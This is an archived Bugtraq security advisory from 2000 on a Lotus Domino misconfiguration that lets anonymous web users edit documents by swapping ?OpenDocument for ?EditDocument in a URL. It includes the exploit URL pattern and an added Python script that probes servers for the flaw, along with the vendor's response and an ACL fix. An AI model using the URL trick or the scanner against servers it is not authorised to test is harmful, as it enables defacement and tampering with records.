Bugtraq mailing list archives

Black Watch Labs Vulnerability Alert


From: blackwatchlabs () PERFECTOTECH COM (Black Watch Labs)
Date: Fri, 19 May 2000 18:55:02 -0700


Dear Security Professional,

The following vulnerability:

    "Lotus Domino Server Misconfiguration – Documents Can Be Modified
over the Web"

is in the text of the message below and has just been posted to the
Black Watch Labs Web site at
http://www.perfectotech.com/blackwatchlabs/

Thank you,
Black Watch Labs

If you wish to unsubscribe from this Black Watch Labs email update, please
click on reply and type the word "Unsubscribe" in the subject line.

----------------------------------------------------------------------------------------------

Name: Lotus Domino Server Misconfiguration – Documents Can Be Modified
over the Web.

Black Watch Labs ID:
BWL-00-07

Date Released:
May 19th, 2000

Category:
Application(HTML)

Products affected:
Lotus Domino Server

Summary:
Documents (records) that a Lotus Domino server makes available for viewing
over the web can also be edited over the web if the access rights (the
database ACL) are not configured properly for them.

Analysis:
The access rights on documents served by Lotus Domino allow users to edit
them even though the URL the site hands out contains only the "open" (i.e.
view) command. Domino acts on whatever command is in the URL, so this is
done simply by modifying the URL: instead of "OpenDocument", the browser
sends "EditDocument".

Exploits:
As hinted above. A typical URL would look like:
http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?OpenDocument

In that case, the exploit is to request
http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?EditDocument

instead. Sites that have their access control in place will pop up an
authentication window, because the server refuses the edit command for an
anonymous user and challenges for credentials. Sites that are vulnerable
will simply display the document in edit view, allowing the attacker to
modify the document data.
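The check described above can be run across a list of a site's document
URLs with the following script. It is an added example, not code from the
Black Watch Labs advisory or from Lotus. It assumes (the advisory does not
say this) that a document rendered in edit view contains a form that posts
back to a ?SaveDocument URL, and treats a 401 or 403 reply as the
authentication challenge the advisory describes. The hostname reuses the
advisory's placeholder, the sample document paths and the canned replies
are constructed so the script runs offline, and network access is injected
so the same code probes a real server when URLs are given on the command
line.

```python
# Added example (not Black Watch Labs' code): re-request each ?OpenDocument
# URL as ?EditDocument and classify the reply. Fetching is injected so the
# constructed samples run without network access.
import re
import sys
import urllib.error
import urllib.request

# Domino URL commands are case-insensitive and may follow '?' or '!'.
OPEN_CMD = re.compile(r"([?!])OpenDocument\b", re.IGNORECASE)

# Assumption: a document rendered in edit view contains a form that posts
# back to a ?SaveDocument URL. That command inside a 200 body is taken as
# evidence that the edit view was served to an anonymous client.
SAVE_FORM = re.compile(r"<form[^>]+SaveDocument", re.IGNORECASE | re.DOTALL)


def to_edit_url(open_url):
    """Rewrite the first OpenDocument command in the URL into EditDocument."""
    edit_url, count = OPEN_CMD.subn(r"\g<1>EditDocument", open_url, count=1)
    if count == 0:
        raise ValueError("no OpenDocument command in URL: " + open_url)
    return edit_url


def classify(status, body):
    """Map one HTTP reply to the advisory's outcomes, plus 'inconclusive'."""
    if status in (401, 403):
        return "protected"      # edit refused: login challenge / forbidden
    if status == 200 and SAVE_FORM.search(body):
        return "editable"       # edit view rendered: document can be modified
    return "inconclusive"       # error page, redirect, custom form: check by hand


def http_fetch(url, timeout=10):
    """Fetch a URL and return (status, body); HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "domino-edit-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("latin-1", "replace")


def check_document(open_url, fetch=http_fetch):
    """Return (edit_url, verdict) for one ?OpenDocument URL."""
    edit_url = to_edit_url(open_url)
    status, body = fetch(edit_url)
    return edit_url, classify(status, body)


# Constructed sample data using the advisory's placeholder hostname: one
# document behind a proper ACL, one that an anonymous user may edit.
SAMPLE_OPEN_URLS = [
    "http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?OpenDocument",
    "http://www.site-running-domino.server/experts.nsf/byname/0a1b2c3d!opendocument",
]
SAMPLE_RESPONSES = {
    "http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?EditDocument":
        (401, "<html><body>You are not authorized to perform this operation</body></html>"),
    "http://www.site-running-domino.server/experts.nsf/byname/0a1b2c3d!EditDocument":
        (200, '<html><body><form method="post" '
              'action="/experts.nsf/byname/0a1b2c3d?SaveDocument">'
              '<input name="Expertise" value="cryptography"></form></body></html>'),
}


def fake_fetch(url):
    """Offline stand-in for http_fetch, served from SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    # With URLs on the command line the real server is probed; otherwise the
    # constructed samples are run so both outcomes are shown.
    urls = sys.argv[1:] or SAMPLE_OPEN_URLS
    fetch = http_fetch if sys.argv[1:] else fake_fetch
    for url in urls:
        edit_url, verdict = check_document(url, fetch=fetch)
        print("%-12s %s" % (verdict, edit_url))
```

Run it only against servers you are authorized to test. A "protected"
verdict means the server refused the edit command for that document; it
says nothing about other databases on the same server, each of which has
its own ACL. An "inconclusive" reply (for example a 200 page that is not an
edit form) should be inspected by hand rather than counted as safe.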

Number of affected sites/pages/users:
We examined sites that run Lotus Domino server and found several that
allow editing. We estimate that more than 10% of such sites have this
vulnerability. Among them:
- A well-known US university offering a large database of professionals
  and experts. Each record contains contact info, field of expertise,
  education, etc. for an individual. Each such record can be edited and
  modified.
- A site devoted to one of the largest cities in the US; the site
  contains an "editor's choice" section for restaurants, which can be
  edited and modified.
- A US government organization's site that contains a large database;
  the database can be modified.
- A US National Institute site whose content is loaded as database
  queries. Parts of the site can be defaced.

Vendor Patch or workaround:
There is no patch; the behaviour is by design. Each site running a Domino
server is encouraged to ensure that its databases are well-configured, so
that outside users are not allowed to change records. In practice this
means reviewing the ACL of every web-accessible database and making sure
the Anonymous (and -Default-) entries grant no more than Reader access,
then confirming the fix by requesting a document with ?EditDocument as an
unauthenticated user and checking that the server refuses it.

Response received from Lotus:
This is not a Defect. The arguments passed in the URL are not a security
feature. In this instance the ACL of the database must be configured
properly to determine if a document can be edited or not. Failure to do
this is considered poor design technique. Commands to edit a document
are passed via URL whether through a button or manually typed in. It is
up to the designer to properly configure a security scheme to determine
how the command will be acted on.

References and Links:
Lotus Domino server: http://www.lotus.com/home.nsf/welcome/domino

Note about our process of contacting the vendor:
We always contact the vendor and give them a few weeks to respond. Some
of them choose to fix it (see the DBMan advisory for example), and some of
them don't. However, once the advisory is published the vendor will
frequently fix it. So, overall, the advisories not only educate security
professionals about the problem, they also encourage vendors to fix the
holes.

About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies
Inc., a leader in application security products. Black Watch Labs was
established in order to further the knowledge of the e-commerce
community in the arena of web application security management. Black
Watch Labs publishes security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to
relevant security lists and websites. Black Watch Labs also operates a
web application security mailing list, which can be subscribed to at
http://www.perfectotech.com/blackwatchlabs/. For more info about
Black Watch Labs and Web Application Security, please call (650)
625-8101 or mail to BlackWatchLabs () phaser perfectotech com

About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Mountain View, Calif., Perfecto
Technologies pioneered the market for Web Application Security
Management software. AppShield, Perfecto's initial product offering, is
the first to provide extreme security for customer-facing applications
in dynamic eBusiness environments. Privately held, Perfecto is funded
by blue-chip venture capital firms and industry leaders, including
Sequoia Capital, Walden, and Intel Corporation. More information about
Perfecto Technologies may be obtained by visiting the Company's Website
at www.perfectotech.com or by calling the Company directly at (650)
625-8101.

Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application
security alerts herein in their entirety, provided the information,
this notice and all other Perfecto Technologies marks remain intact.

Specific Limitations on Use of the Perfecto Technologies Website
THIS SITE INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY
RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET, INCLUDING,
POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS SITE IS
SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH
RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY PERFECTO
TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR
ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE SECURITY OF
ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY
IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO
CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND OTHER COUNTRIES.

NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an "as
is" basis and may change without notice. Perfecto Technologies makes no
warranties of any kind, either expressed or implied, as to any matter
including but not limited to warranty of fitness for a particular
purpose or merchantability, exclusivity or results obtained from use of
the material. Neither does Perfecto Technologies make any warranty of
any kind with respect to freedom from patent, trademark or copyright
infringement. In no event shall Perfecto Technologies be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
